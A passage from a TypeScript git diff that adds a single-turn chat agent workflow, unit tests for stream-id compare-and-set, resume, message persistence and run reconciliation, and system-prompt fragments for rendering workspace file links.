+}; + +/** + * Vercel Workflow that drives the chat agent loop. The route handler calls + * `start(runAgentWorkflow, [...])` and pipes `run.getReadable()` back to the + * client; this function writes UIMessage chunks into the workflow's writable + * via `runAgentStep`. + * + * Currently runs a SINGLE `runAgentStep` turn. A multi-turn agent loop is + * unsafe today: each iteration would re-send the original prompt without + * the assistant's tool-call response in scope, so a `tool-calls` finish + * reason would loop forever on the same input. 
The proper multi-turn + * shape (where the step appends its response to `messages` before the + * next iteration) lands with the sandbox-tool port in PR 4. + * + * Until then, if the model returns `tool-calls` we log a warning and exit + * — the client receives the partial tool-call chunks but no follow-up turn. + * + * WDK constraints honored: + * - All I/O (streamText, fetches) lives in `"use step"` functions. + * - The workflow body only orchestrates — no fetch / setTimeout / fs / crypto. + */ +export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise { + "use workflow"; + + console.log("[runAgentWorkflow] start", { + chatId: input.chatId, + sessionId: input.sessionId, + modelId: input.modelId, + }); + + const writable = getWritable(); + const result = await runAgentStep({ + messages: input.messages, + modelId: input.modelId, + writable, + }); + + if (result.finishReason === "tool-calls") { + console.warn( + "[runAgentWorkflow] model returned tool-calls but tool execution is not wired yet; exiting after 1 turn", + { chatId: input.chatId }, + ); + } else { + console.log("[runAgentWorkflow] finish", { finishReason: result.finishReason }); + } +} diff --git a/lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts b/lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts new file mode 100644 index 000000000..af22bd363 --- /dev/null +++ b/lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts @@ -0,0 +1,51 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId"; +import { updateChat } from "@/lib/supabase/chats/updateChat"; + +vi.mock("@/lib/supabase/chats/updateChat", () => ({ + updateChat: vi.fn(), +})); + +beforeEach(() => vi.clearAllMocks()); + +describe("compareAndSetChatActiveStreamId", () => { + it("returns ok:true claimed:true when the row predicate matches and is updated", async () => { + 
vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 1, row: null }); + const result = await compareAndSetChatActiveStreamId("chat-1", null, "wrun_x"); + expect(result).toEqual({ ok: true, claimed: true }); + expect(updateChat).toHaveBeenCalledWith( + { id: "chat-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + }); + + it("returns ok:true claimed:false when the predicate matches no rows (race lost)", async () => { + vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 0, row: null }); + const result = await compareAndSetChatActiveStreamId("chat-1", null, "wrun_x"); + expect(result).toEqual({ ok: true, claimed: false }); + }); + + it("returns ok:false with the underlying error on DB failure (distinct from race lost)", async () => { + vi.mocked(updateChat).mockResolvedValue({ ok: false, error: "down" }); + const result = await compareAndSetChatActiveStreamId("chat-1", null, "wrun_x"); + expect(result).toEqual({ ok: false, error: "down" }); + }); + + it("supports expecting a specific run id (placeholder → real promotion)", async () => { + vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 1, row: null }); + await compareAndSetChatActiveStreamId("chat-1", "pending-abc", "wrun_real"); + expect(updateChat).toHaveBeenCalledWith( + { id: "chat-1", where: { active_stream_id: "pending-abc" } }, + { active_stream_id: "wrun_real" }, + ); + }); + + it("supports next=null (releasing the slot)", async () => { + vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 1, row: null }); + await compareAndSetChatActiveStreamId("chat-1", "wrun_old", null); + expect(updateChat).toHaveBeenCalledWith( + { id: "chat-1", where: { active_stream_id: "wrun_old" } }, + { active_stream_id: null }, + ); + }); +}); diff --git a/lib/chat/__tests__/handleChatWorkflowStream.test.ts b/lib/chat/__tests__/handleChatWorkflowStream.test.ts index c61911be8..fb3b434f1 100644 --- 
a/lib/chat/__tests__/handleChatWorkflowStream.test.ts +++ b/lib/chat/__tests__/handleChatWorkflowStream.test.ts @@ -6,22 +6,38 @@ import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; import { selectSessions } from "@/lib/supabase/sessions/selectSessions"; import { selectChats } from "@/lib/supabase/chats/selectChats"; import { isSandboxActive } from "@/lib/sandbox/isSandboxActive"; +import { updateSession } from "@/lib/supabase/sessions/updateSession"; +import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId"; +import { maybeResumeChatStream } from "@/lib/chat/maybeResumeChatStream"; +import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage"; +import { start, getRun } from "workflow/api"; -vi.mock("@/lib/chat/validateChatWorkflow", () => ({ - validateChatWorkflow: vi.fn(), +vi.mock("@/lib/chat/validateChatWorkflow", () => ({ validateChatWorkflow: vi.fn() })); +vi.mock("@/lib/supabase/sessions/selectSessions", () => ({ selectSessions: vi.fn() })); +vi.mock("@/lib/supabase/chats/selectChats", () => ({ selectChats: vi.fn() })); +vi.mock("@/lib/chat/compareAndSetChatActiveStreamId", () => ({ + compareAndSetChatActiveStreamId: vi.fn(), })); -vi.mock("@/lib/supabase/sessions/selectSessions", () => ({ - selectSessions: vi.fn(), +vi.mock("@/lib/sandbox/isSandboxActive", () => ({ isSandboxActive: vi.fn() })); +vi.mock("@/lib/supabase/sessions/updateSession", () => ({ updateSession: vi.fn() })); +vi.mock("@/lib/sandbox/buildActiveLifecycleUpdate", () => ({ + buildActiveLifecycleUpdate: vi.fn(() => ({})), })); -vi.mock("@/lib/supabase/chats/selectChats", () => ({ - selectChats: vi.fn(), +vi.mock("@/lib/chat/maybeResumeChatStream", () => ({ + maybeResumeChatStream: vi.fn(), })); -vi.mock("@/lib/sandbox/isSandboxActive", () => ({ - isSandboxActive: vi.fn(), +vi.mock("@/lib/chat/persistLatestUserMessage", () => ({ + persistLatestUserMessage: vi.fn(), })); +vi.mock("workflow/api", () => ({ + start: 
vi.fn(), + getRun: vi.fn(), +})); +vi.mock("@/app/lib/workflows/runAgentWorkflow", () => ({ runAgentWorkflow: vi.fn() })); vi.mock("@/lib/networking/getCorsHeaders", () => ({ getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })), })); +vi.mock("@/lib/uuid/generateUUID", () => ({ default: vi.fn(() => "deterministic-uuid") })); const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa"; const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb"; @@ -36,130 +52,275 @@ function makeRequest(): NextRequest { }); } -function mockValidatedRequest(overrides: Partial<{ accountId: string }> = {}) { +function mockValidated() { vi.mocked(validateChatWorkflow).mockResolvedValue({ messages: [], chatId: CHAT_ID, sessionId: SESSION_ID, - accountId: overrides.accountId ?? ACCOUNT_ID, + accountId: ACCOUNT_ID, orgId: null, authToken: "test-key", }); } -function mockOwnedSessionWithActiveSandbox() { - mockValidatedRequest(); +function mockSessionOwnedActive(extra: Record = {}) { vi.mocked(selectSessions).mockResolvedValue([ - { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true }, ...extra } as never, ]); - vi.mocked(selectChats).mockResolvedValue([{ id: CHAT_ID, session_id: SESSION_ID } as never]); vi.mocked(isSandboxActive).mockReturnValue(true); } -describe("handleChatWorkflowStream (stub)", () => { - beforeEach(() => { - vi.clearAllMocks(); +function mockChatOwned(extra: Record = {}) { + vi.mocked(selectChats).mockResolvedValue([ + { + id: CHAT_ID, + session_id: SESSION_ID, + active_stream_id: null, + model_id: null, + ...extra, + } as never, + ]); +} + +function mockStartedRun(runId = "wrun_test_run_1") { + const stream = new ReadableStream({ + start(controller) { + controller.enqueue({ type: "text-start", id: "a" }); + controller.close(); + }, }); + vi.mocked(start).mockResolvedValue({ runId, getReadable: () => stream } as never); + 
vi.mocked(getRun).mockReturnValue({ cancel: vi.fn(() => Promise.resolve()) } as never); + return { runId, stream }; +} + +beforeEach(() => { + vi.clearAllMocks(); + // Default: maybeResumeChatStream returns null (no resume / no active stream) + vi.mocked(maybeResumeChatStream).mockResolvedValue(null); +}); - describe("validation short-circuits", () => { - it("returns the validator's short-circuit response unchanged (e.g. 401)", async () => { - const authError = NextResponse.json( - { status: "error", error: "Unauthorized" }, - { status: 401 }, +describe("handleChatWorkflowStream", () => { + describe("short-circuit responses", () => { + it("passes through the validator's response (401/400)", async () => { + vi.mocked(validateChatWorkflow).mockResolvedValue( + NextResponse.json({ status: "error", error: "Unauthorized" }, { status: 401 }), ); - vi.mocked(validateChatWorkflow).mockResolvedValue(authError); const res = await handleChatWorkflowStream(makeRequest()); expect(res.status).toBe(401); + expect(start).not.toHaveBeenCalled(); }); - it("returns the validator's 400 unchanged (e.g. 
invalid body)", async () => { - const badBody = NextResponse.json( - { status: "error", error: "Invalid JSON body" }, - { status: 400 }, - ); - vi.mocked(validateChatWorkflow).mockResolvedValue(badBody); + it("returns 500 when selectSessions errors", async () => { + mockValidated(); + vi.mocked(selectSessions).mockResolvedValue(null); const res = await handleChatWorkflowStream(makeRequest()); - expect(res.status).toBe(400); + expect(res.status).toBe(500); }); - }); - describe("session / chat ownership", () => { - beforeEach(() => mockValidatedRequest()); - - it("returns 404 when the session does not exist", async () => { + it("returns 404 when session does not exist", async () => { + mockValidated(); vi.mocked(selectSessions).mockResolvedValue([]); const res = await handleChatWorkflowStream(makeRequest()); expect(res.status).toBe(404); }); - it("returns 500 when selectSessions errors (returns null)", async () => { - vi.mocked(selectSessions).mockResolvedValue(null); - const res = await handleChatWorkflowStream(makeRequest()); - expect(res.status).toBe(500); - }); - - it("returns 403 when the session is owned by a different account", async () => { + it("returns 403 when session not owned", async () => { + mockValidated(); vi.mocked(selectSessions).mockResolvedValue([ - { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: { ready: true } } as never, + { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: {} } as never, ]); const res = await handleChatWorkflowStream(makeRequest()); expect(res.status).toBe(403); }); - it("returns 400 'Sandbox not initialized' when sandbox is inactive", async () => { + it("returns 400 when sandbox is inactive", async () => { + mockValidated(); vi.mocked(selectSessions).mockResolvedValue([ { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: null } as never, ]); vi.mocked(isSandboxActive).mockReturnValue(false); const res = await handleChatWorkflowStream(makeRequest()); expect(res.status).toBe(400); - const body = 
await res.json(); - expect(body.error).toMatch(/sandbox/i); }); - it("returns 404 when the chat does not exist", async () => { - vi.mocked(selectSessions).mockResolvedValue([ - { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, - ]); - vi.mocked(isSandboxActive).mockReturnValue(true); + it("returns 404 when chat does not exist", async () => { + mockValidated(); + mockSessionOwnedActive(); vi.mocked(selectChats).mockResolvedValue([]); const res = await handleChatWorkflowStream(makeRequest()); expect(res.status).toBe(404); }); + }); - it("returns 404 when chat exists but belongs to a different session", async () => { - vi.mocked(selectSessions).mockResolvedValue([ - { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, - ]); - vi.mocked(isSandboxActive).mockReturnValue(true); - vi.mocked(selectChats).mockResolvedValue([ - { id: CHAT_ID, session_id: "different-session" } as never, - ]); + describe("resume / conflict via maybeResumeChatStream", () => { + beforeEach(() => { + mockValidated(); + mockSessionOwnedActive(); + mockChatOwned({ active_stream_id: "wrun_existing" }); + }); + + it("returns the resume response when maybeResumeChatStream yields one", async () => { + const resumeResponse = new Response("ok", { + status: 200, + headers: { "x-workflow-run-id": "wrun_existing" }, + }); + vi.mocked(maybeResumeChatStream).mockResolvedValue(resumeResponse); const res = await handleChatWorkflowStream(makeRequest()); - expect(res.status).toBe(404); + expect(res.headers.get("x-workflow-run-id")).toBe("wrun_existing"); + expect(start).not.toHaveBeenCalled(); + }); + + it("returns the conflict response when maybeResumeChatStream yields 409", async () => { + const conflict = NextResponse.json({ status: "error", error: "conflict" }, { status: 409 }); + vi.mocked(maybeResumeChatStream).mockResolvedValue(conflict); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(409); + 
expect(start).not.toHaveBeenCalled(); }); }); - describe("success (stub response)", () => { - beforeEach(() => mockOwnedSessionWithActiveSandbox()); + describe("placeholder CAS before start", () => { + beforeEach(() => { + mockValidated(); + mockSessionOwnedActive(); + mockChatOwned(); + }); + + it("returns 500 when the placeholder-CAS hits a DB error", async () => { + vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValueOnce({ + ok: false, + error: "down", + }); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(500); + expect(start).not.toHaveBeenCalled(); + }); - it("returns 200 with text/event-stream content type", async () => { + it("returns 409 (without calling start) when the placeholder-CAS loses the race", async () => { + vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValueOnce({ + ok: true, + claimed: false, + }); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(409); + expect(start).not.toHaveBeenCalled(); + }); + + it("starts the workflow only after placeholder CAS succeeds", async () => { + // First CAS = placeholder claim, second CAS = promote placeholder → real run id + vi.mocked(compareAndSetChatActiveStreamId) + .mockResolvedValueOnce({ ok: true, claimed: true }) + .mockResolvedValueOnce({ ok: true, claimed: true }); + mockStartedRun(); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(200); + expect(start).toHaveBeenCalled(); + // Confirm CAS-before-start ordering — first CAS pre-claims with expected=null + const firstCallArgs = vi.mocked(compareAndSetChatActiveStreamId).mock.calls[0]; + expect(firstCallArgs?.[0]).toBe(CHAT_ID); + expect(firstCallArgs?.[1]).toBeNull(); + expect(firstCallArgs?.[2]).toMatch(/^pending-/); + }); + }); + + describe("happy path", () => { + beforeEach(() => { + mockValidated(); + mockSessionOwnedActive(); + mockChatOwned(); + vi.mocked(compareAndSetChatActiveStreamId) + .mockResolvedValueOnce({ 
ok: true, claimed: true }) + .mockResolvedValueOnce({ ok: true, claimed: true }); + }); + + it("returns 200 with text/event-stream and x-workflow-run-id", async () => { + const { runId } = mockStartedRun("wrun_abc_123"); const res = await handleChatWorkflowStream(makeRequest()); expect(res.status).toBe(200); expect(res.headers.get("content-type") ?? "").toMatch(/text\/event-stream/); + expect(res.headers.get("x-workflow-run-id")).toBe(runId); + }); + + it("refreshes session lifecycle activity", async () => { + mockStartedRun(); + await handleChatWorkflowStream(makeRequest()); + expect(updateSession).toHaveBeenCalledWith(SESSION_ID, expect.any(Object)); + }); + + it("fire-and-forgets persistLatestUserMessage", async () => { + mockStartedRun(); + await handleChatWorkflowStream(makeRequest()); + expect(persistLatestUserMessage).toHaveBeenCalledWith(CHAT_ID, []); + }); + + it("passes chat.model_id into the workflow when set", async () => { + vi.mocked(selectChats).mockResolvedValue([ + { + id: CHAT_ID, + session_id: SESSION_ID, + active_stream_id: null, + model_id: "anthropic/claude-opus-4.6", + } as never, + ]); + mockStartedRun(); + await handleChatWorkflowStream(makeRequest()); + const startArgs = vi.mocked(start).mock.calls[0]?.[1]?.[0] as { modelId: string }; + expect(startArgs.modelId).toBe("anthropic/claude-opus-4.6"); + }); + + it("falls back to the default model when chat.model_id is null", async () => { + mockStartedRun(); + await handleChatWorkflowStream(makeRequest()); + const startArgs = vi.mocked(start).mock.calls[0]?.[1]?.[0] as { modelId: string }; + expect(startArgs.modelId).toBe("anthropic/claude-haiku-4.5"); + }); + }); + + describe("promote placeholder → run id", () => { + beforeEach(() => { + mockValidated(); + mockSessionOwnedActive(); + mockChatOwned(); }); - it("sets an x-workflow-run-id response header starting with stub-", async () => { + it("awaits cancel() and returns 409 if promote loses", async () => { + 
vi.mocked(compareAndSetChatActiveStreamId) + .mockResolvedValueOnce({ ok: true, claimed: true }) // claim ok + .mockResolvedValueOnce({ ok: true, claimed: false }); // promote raced + const cancel = vi.fn(() => Promise.resolve()); + vi.mocked(start).mockResolvedValue({ + runId: "wrun_lost", + getReadable: () => new ReadableStream(), + } as never); + vi.mocked(getRun).mockReturnValue({ cancel } as never); const res = await handleChatWorkflowStream(makeRequest()); - const runId = res.headers.get("x-workflow-run-id"); - expect(runId).toBeTruthy(); - expect(runId!.startsWith("stub-")).toBe(true); + expect(res.status).toBe(409); + expect(getRun).toHaveBeenCalledWith("wrun_lost"); + expect(cancel).toHaveBeenCalled(); }); - it("emits a stream body that includes the stub assistant text", async () => { + it("still returns 409 if cancel() throws (best-effort)", async () => { + vi.mocked(compareAndSetChatActiveStreamId) + .mockResolvedValueOnce({ ok: true, claimed: true }) + .mockResolvedValueOnce({ ok: true, claimed: false }); + vi.mocked(start).mockResolvedValue({ + runId: "wrun_lost", + getReadable: () => new ReadableStream(), + } as never); + // Wrap rejection in an async IIFE + attach a noop handler so Vitest's + // unhandled-rejection watcher doesn't fire before the SUT awaits. 
+ const cancelRejection = (async () => { + throw new Error("cancel exploded"); + })(); + cancelRejection.catch(() => { + /* SUT will await this and convert to logged catch */ + }); + vi.mocked(getRun).mockReturnValue({ + cancel: vi.fn(() => cancelRejection), + } as never); const res = await handleChatWorkflowStream(makeRequest()); - const text = await res.text(); - expect(text).toContain("Hello from /api/chat/workflow"); + expect(res.status).toBe(409); }); }); }); diff --git a/lib/chat/__tests__/maybeResumeChatStream.test.ts b/lib/chat/__tests__/maybeResumeChatStream.test.ts new file mode 100644 index 000000000..999c29d24 --- /dev/null +++ b/lib/chat/__tests__/maybeResumeChatStream.test.ts @@ -0,0 +1,46 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { maybeResumeChatStream } from "@/lib/chat/maybeResumeChatStream"; +import { reconcileExistingActiveStream } from "@/lib/chat/reconcileExistingActiveStream"; + +vi.mock("@/lib/chat/reconcileExistingActiveStream", () => ({ + reconcileExistingActiveStream: vi.fn(), +})); +vi.mock("@/lib/networking/getCorsHeaders", () => ({ + getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })), +})); + +beforeEach(() => vi.clearAllMocks()); + +describe("maybeResumeChatStream", () => { + it("returns null when there is no active_stream_id", async () => { + const res = await maybeResumeChatStream("chat-1", null); + expect(res).toBeNull(); + expect(reconcileExistingActiveStream).not.toHaveBeenCalled(); + }); + + it("returns null when reconcile says action=ready", async () => { + vi.mocked(reconcileExistingActiveStream).mockResolvedValue({ action: "ready" }); + const res = await maybeResumeChatStream("chat-1", "wrun_dead"); + expect(res).toBeNull(); + }); + + it("returns a 200 SSE response with x-workflow-run-id on resume", async () => { + const stream = new ReadableStream(); + vi.mocked(reconcileExistingActiveStream).mockResolvedValue({ + action: "resume", + runId: "wrun_live", + stream, + }); + 
const res = await maybeResumeChatStream("chat-1", "wrun_live"); + expect(res).not.toBeNull(); + expect(res!.status).toBe(200); + expect(res!.headers.get("x-workflow-run-id")).toBe("wrun_live"); + expect(res!.headers.get("content-type") ?? "").toMatch(/text\/event-stream/); + }); + + it("returns a 409 on conflict", async () => { + vi.mocked(reconcileExistingActiveStream).mockResolvedValue({ action: "conflict" }); + const res = await maybeResumeChatStream("chat-1", "wrun_x"); + expect(res!.status).toBe(409); + }); +}); diff --git a/lib/chat/__tests__/persistLatestUserMessage.test.ts b/lib/chat/__tests__/persistLatestUserMessage.test.ts new file mode 100644 index 000000000..28d4f7650 --- /dev/null +++ b/lib/chat/__tests__/persistLatestUserMessage.test.ts @@ -0,0 +1,129 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage"; + +import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage"; +import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages"; +import { updateChat } from "@/lib/supabase/chats/updateChat"; + +vi.mock("@/lib/supabase/chat_messages/upsertChatMessage", () => ({ + upsertChatMessage: vi.fn(), +})); +vi.mock("@/lib/supabase/chat_messages/selectChatMessages", () => ({ + selectChatMessages: vi.fn(), +})); +vi.mock("@/lib/supabase/chats/updateChat", () => ({ + updateChat: vi.fn(), +})); + +const CHAT_ID = "chat-1"; +const MSG_ID = "msg-1"; + +function userMessage(text = "hello world", id = MSG_ID) { + return { id, role: "user" as const, parts: [{ type: "text" as const, text }] }; +} + +beforeEach(() => { + vi.clearAllMocks(); +}); + +describe("persistLatestUserMessage", () => { + it("no-ops when the last message is not a user message", async () => { + await persistLatestUserMessage(CHAT_ID, [{ id: "a", role: "assistant", parts: [] } as never]); + expect(upsertChatMessage).not.toHaveBeenCalled(); + 
expect(updateChat).not.toHaveBeenCalled(); + }); + + it("no-ops when messages array is empty", async () => { + await persistLatestUserMessage(CHAT_ID, []); + expect(upsertChatMessage).not.toHaveBeenCalled(); + }); + + it("bails on DB error (upsert ok:false) without touching the chat", async () => { + vi.mocked(upsertChatMessage).mockResolvedValue({ ok: false, error: "down" }); + await persistLatestUserMessage(CHAT_ID, [userMessage()]); + expect(updateChat).not.toHaveBeenCalled(); + }); + + it("bails on duplicate (already persisted) without touching the chat", async () => { + vi.mocked(upsertChatMessage).mockResolvedValue({ ok: true, row: null, isDuplicate: true }); + await persistLatestUserMessage(CHAT_ID, [userMessage()]); + expect(updateChat).not.toHaveBeenCalled(); + }); + + it("touches updated_at after a new insert", async () => { + vi.mocked(upsertChatMessage).mockResolvedValue({ + ok: true, + row: { id: MSG_ID } as never, + isDuplicate: false, + }); + vi.mocked(selectChatMessages).mockResolvedValue([{ id: "different-msg" } as never]); + await persistLatestUserMessage(CHAT_ID, [userMessage()]); + const firstCall = vi.mocked(updateChat).mock.calls[0]; + expect(firstCall?.[0]).toEqual({ id: CHAT_ID }); + expect(firstCall?.[1]).toMatchObject({ updated_at: expect.any(String) }); + }); + + it("sets chat.title when the inserted message is the earliest", async () => { + vi.mocked(upsertChatMessage).mockResolvedValue({ + ok: true, + row: { id: MSG_ID } as never, + isDuplicate: false, + }); + vi.mocked(selectChatMessages).mockResolvedValue([{ id: MSG_ID } as never]); + await persistLatestUserMessage(CHAT_ID, [userMessage("Hello there from a test")]); + const titleCall = vi + .mocked(updateChat) + .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined); + expect(titleCall?.[1]).toEqual({ title: "Hello there from a test" }); + }); + + it("skips title when the inserted message is no longer the earliest", async () => { + 
vi.mocked(upsertChatMessage).mockResolvedValue({ + ok: true, + row: { id: MSG_ID } as never, + isDuplicate: false, + }); + vi.mocked(selectChatMessages).mockResolvedValue([{ id: "older-msg" } as never]); + await persistLatestUserMessage(CHAT_ID, [userMessage()]); + const titleCall = vi + .mocked(updateChat) + .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined); + expect(titleCall).toBeUndefined(); + }); + + it("truncates titles to exactly TITLE_MAX_LENGTH including the suffix", async () => { + vi.mocked(upsertChatMessage).mockResolvedValue({ + ok: true, + row: { id: MSG_ID } as never, + isDuplicate: false, + }); + vi.mocked(selectChatMessages).mockResolvedValue([{ id: MSG_ID } as never]); + const long = "x".repeat(120); + await persistLatestUserMessage(CHAT_ID, [userMessage(long)]); + const titleCall = vi + .mocked(updateChat) + .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined); + const title = (titleCall?.[1] as { title: string }).title; + expect(title.length).toBe(80); + expect(title.endsWith("…")).toBe(true); + }); + + it("bails on title-set when selectChatMessages errors (null)", async () => { + vi.mocked(upsertChatMessage).mockResolvedValue({ + ok: true, + row: { id: MSG_ID } as never, + isDuplicate: false, + }); + vi.mocked(selectChatMessages).mockResolvedValue(null); + await persistLatestUserMessage(CHAT_ID, [userMessage()]); + const titleCall = vi + .mocked(updateChat) + .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined); + expect(titleCall).toBeUndefined(); + }); + + it("swallows thrown errors without escaping", async () => { + vi.mocked(upsertChatMessage).mockRejectedValue(new Error("boom")); + await expect(persistLatestUserMessage(CHAT_ID, [userMessage()])).resolves.toBeUndefined(); + }); +}); diff --git a/lib/chat/__tests__/reconcileExistingActiveStream.test.ts b/lib/chat/__tests__/reconcileExistingActiveStream.test.ts new file mode 100644 index 000000000..b40e12ce6 --- /dev/null +++ 
b/lib/chat/__tests__/reconcileExistingActiveStream.test.ts @@ -0,0 +1,92 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { reconcileExistingActiveStream } from "@/lib/chat/reconcileExistingActiveStream"; +import { getRun } from "workflow/api"; +import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId"; + +vi.mock("workflow/api", () => ({ + getRun: vi.fn(), +})); +vi.mock("@/lib/chat/compareAndSetChatActiveStreamId", () => ({ + compareAndSetChatActiveStreamId: vi.fn(), +})); + +const CHAT_ID = "chat-1"; +const RUN_ID = "wrun_test"; + +beforeEach(() => vi.clearAllMocks()); + +function mockRun(status: string, getReadable: () => ReadableStream = () => new ReadableStream()) { + vi.mocked(getRun).mockReturnValue({ + status: Promise.resolve(status), + getReadable, + } as never); +} + +describe("reconcileExistingActiveStream", () => { + it("returns action=resume when status is 'running'", async () => { + const stream = new ReadableStream(); + mockRun("running", () => stream); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + expect(result.action).toBe("resume"); + if (result.action !== "resume") return; + expect(result.runId).toBe(RUN_ID); + expect(result.stream).toBe(stream); + }); + + it("returns action=resume when status is 'pending'", async () => { + mockRun("pending"); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + expect(result.action).toBe("resume"); + }); + + it("returns action=ready after CASing a completed run's stale id to null", async () => { + mockRun("completed"); + vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValue({ ok: true, claimed: true }); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + expect(result.action).toBe("ready"); + expect(compareAndSetChatActiveStreamId).toHaveBeenCalledWith(CHAT_ID, RUN_ID, null); + }); + + it("returns action=conflict when getRun throws (transient workflow API error)", async () => { 
+ vi.mocked(getRun).mockImplementation(() => { + throw new Error("workflow API unreachable"); + }); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + expect(result.action).toBe("conflict"); + // Critical: we do NOT clear the stream id on transient error. + expect(compareAndSetChatActiveStreamId).not.toHaveBeenCalled(); + }); + + it("returns action=conflict when status promise rejects", async () => { + // Wrap in a thenable that defers the rejection so Vitest's + // unhandled-rejection watcher doesn't flag it before the code awaits. + const rejection: Promise = (async () => { + throw new Error("status fetch failed"); + })(); + rejection.catch(() => { + /* attach a handler so it's not 'unhandled' before the SUT awaits */ + }); + vi.mocked(getRun).mockReturnValue({ + status: rejection, + getReadable: () => new ReadableStream(), + } as never); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + expect(result.action).toBe("conflict"); + expect(compareAndSetChatActiveStreamId).not.toHaveBeenCalled(); + }); + + it("returns action=conflict when CAS-clear loses the race (claimed=false)", async () => { + mockRun("completed"); + vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValue({ ok: true, claimed: false }); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + expect(result.action).toBe("conflict"); + }); + + it("returns action=conflict when CAS-clear hits a DB error (ok:false)", async () => { + mockRun("completed"); + vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValue({ ok: false, error: "down" }); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + // P1 fix: a failed re-read after CAS no longer falls through to "ready". 
+ expect(result.action).toBe("conflict"); + }); +}); diff --git a/lib/chat/agentCustomInstructions.ts b/lib/chat/agentCustomInstructions.ts new file mode 100644 index 000000000..0a3191ea7 --- /dev/null +++ b/lib/chat/agentCustomInstructions.ts @@ -0,0 +1,9 @@ +import { assistantFileLinkPrompt } from "@/lib/chat/assistantFileLinks"; +import { recoupApiSkillPrompt } from "@/lib/chat/recoupApiSkillPrompt"; + +/** + * Platform-wide agent instructions appended on every chat-workflow prompt. + * Combines individual prompt fragments here so the route and tests share one + * source of truth instead of re-joining the same strings in each place. + */ +export const agentCustomInstructions = [assistantFileLinkPrompt, recoupApiSkillPrompt].join("\n\n"); diff --git a/lib/chat/assistantFileLinks.ts b/lib/chat/assistantFileLinks.ts new file mode 100644 index 000000000..b5bd9280f --- /dev/null +++ b/lib/chat/assistantFileLinks.ts @@ -0,0 +1,28 @@ +const WORKSPACE_FILE_HREF_PREFIX = "#workspace-file="; + +function normalizeWorkspaceFilePath(filePath: string): string { + return filePath.replaceAll("\\", "/").trim(); +} + +/** + * Build the in-app deep link the chat UI uses to open a workspace file. + * + * @param filePath - Repo-relative file path (e.g. `src/index.ts`). + * @returns Href fragment prefixed with `#workspace-file=`. + */ +export function buildWorkspaceFileHref(filePath: string): string { + return `${WORKSPACE_FILE_HREF_PREFIX}${normalizeWorkspaceFilePath(filePath)}`; +} + +/** + * System prompt fragment telling the assistant how to render workspace + * file paths as clickable links inside chat messages. + */ +export const assistantFileLinkPrompt = [ + "When you mention a workspace file path in assistant text, render it as a markdown link using this exact format:", + `- \`[path/to/file.ts](${buildWorkspaceFileHref("path/to/file.ts")})\``, + "- Use the repo-relative file path as both the visible link text and the path inside the link.", + "- Whole-file links only for now. 
